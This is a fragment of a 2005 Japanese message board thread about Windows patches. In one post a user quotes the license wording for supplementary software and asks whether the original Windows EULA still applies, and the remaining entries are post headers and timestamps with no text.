>MicrosoftWindows ソフトウェア (以下「本ソフトウェア」といいます) (ry >お客様による本追加ソフトウェアの使用は、本ソフトウェアに >付属する使用許諾契約書に拘束されるものとします。 本追加ソフトウェア=このパッチ? 本ソフトウェア=元のWindows? 結局元々のEULAそのまま(今までと同じ)ということでいい? ナンカヤヤコシイ
970 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 23:46:54
972 :
Windows 2000 SP4 UR1関連 :2005/07/19(火) 09:47:40
973 :
名無しさん@お腹いっぱい。 :2005/07/19(火) 14:14:54
974 :
名無しさん@お腹いっぱい。 :2005/07/20(水) 16:42:14
975 :
名無しさん@お腹いっぱい。 :2005/07/25(月) 11:47:53
977 :
名無しさん@お腹いっぱい。 :2005/08/05(金) 11:00:46
978 :
名無しさん@お腹いっぱい。 :
2005/08/09(火) 09:40:05